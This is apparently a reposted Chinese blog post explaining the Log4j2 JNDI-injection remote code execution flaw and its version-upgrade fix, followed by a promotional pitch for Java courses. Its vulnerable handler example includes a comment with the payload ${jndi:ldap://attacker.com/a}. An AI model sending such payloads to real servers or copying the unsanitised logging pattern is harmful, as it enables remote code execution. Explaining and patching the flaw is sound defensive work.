不是吧。。Log4j2突发重大漏洞

最新推荐文章于 2025-03-14 18:10:44 发布

原创最新推荐文章于 2025-03-14 18:10:44 发布 · 715 阅读

12 ·

CC 4.0 BY-SA版权

文章标签：

#log4j

程序员专栏收录该内容

821 篇文章

订阅专栏

本文讲述了Log4j2库的远程代码执行漏洞及其解决，涉及JavaJNDI注入原理。作者分享了如何通过SpringBoot和Gradle构建项目的解决方案，并讨论了Java工程师的自学挑战和在线学习平台的价值，推荐了《一线大厂Java面试题解析》等学习资源。

看到这些消息后，老王紧张的情绪一下子就缓解了下来，就像吃了一颗定心丸，赶紧去通知小二不用再提心吊胆了，直接一行代码搞定。

<log4j2.version>2.15.0</log4j2.version>

详情可参照 Spring Boot 官方这篇博客：

https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

Gradle 构建的项目也有解决方案。

问题是解决了，不过老王没闲着。他从 Log4j2 官网公布的最新消息中琢磨出，本次远程代码执行漏洞正是由于组件存在 Java JNDI 注入漏洞：当程序将用户输入的数据记录到日志时，攻击者通过构造特殊请求，来触发 Apache Log4j2 中的远程代码执行漏洞，从而利用此漏洞在目标服务器上执行任意代码。

那肯定会有小伙伴在好奇 JNDI 是什么东东？来看一下维基百科的解释。

Java命名和目录接口（Java Naming and Directory Interface，缩写JNDI），是Java的一个目录服务应用程序接口（API），它提供一个目录系统，并将服务名称与对象关联起来，从而使得开发人员在开发过程中可以使用名称来访问对象。

利用下面这段代码，攻击者可以通过JNDI来执行LDAP协议来注入一些非法的可执行代码。

public class VulnerableLog4jExampleHandler implements HttpHandler {

static Logger log = Logger.getLogger(log4jExample.class.getName());

/**

A simple HTTP endpoint that reads the request’s User Agent and logs it back.
This is basically pseudo-code to explain the vulnerability, and not a full example.
@param he HTTP Request Object

public void handle(HttpExchange he) throws IOException {

String userAgent = he.getRequestHeader(“user-agent”);

// This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.

// The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}

log.info(“Request User Agent:” + userAgent);

String response = "

Hello There, " + userAgent + “!

”;

he.sendResponseHeaders(200, response.length());

OutputStream os = he.getResponseBody();

os.write(response.getBytes());

os.close();

}

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数Java工程师，想要提升技能，往往是自己摸索成长或者是报班学习，但对于培训机构动则几千的学费，着实压力不小。自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年Java开发全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友，同时减轻大家的负担。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上Java开发知识点，真正体系化！

由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！

如果你觉得这些内容对你有帮助，可以扫码获取！！（备注Java获取）

最后

为什么我不完全主张自学？
①平台上的大牛基本上都有很多年的工作经验了，你有没有想过之前行业的门槛是什么样的，现在行业门槛是什么样的？以前企业对于程序员能力要求没有这么高，甚至十多年前你只要会写个“Hello World”，你都可以入门这个行业，所以以前要入门是完全可以入门的。
②现在也有一些优秀的年轻大牛，他们或许也是自学成才，但是他们一定是具备优秀的学习能力，优秀的自我管理能力（时间管理，静心坚持等方面）以及善于发现问题并总结问题。
如果说你认为你的目标十分明确，能做到第②点所说的几个点，以目前的市场来看，你才真正的适合去自学。

除此之外，对于绝大部分人来说，报班一定是最好的一种快速成长的方式。但是有个问题，现在市场上的培训机构质量参差不齐，如果你没有找准一个好的培训班，完全是浪费精力，时间以及金钱，这个需要自己去甄别选择。

我个人建议线上比线下的性价比更高，线下培训价格基本上没2W是下不来的，线上教育现在比较成熟了，此次疫情期间，学生基本上都感受过线上的学习模式。相比线下而言，线上的优势以我的了解主要是以下几个方面：
①价格：线上的价格基本上是线下的一半；
②老师：相对而言线上教育的师资力量比线下更强大也更加丰富，资源更好协调；
③时间：学习时间相对而言更自由，不用裸辞学习，适合边学边工作，降低生活压力；
④课程：从课程内容来说，确实要比线下讲的更加深入。

应该学哪些技术才能达到企业的要求？（下图总结）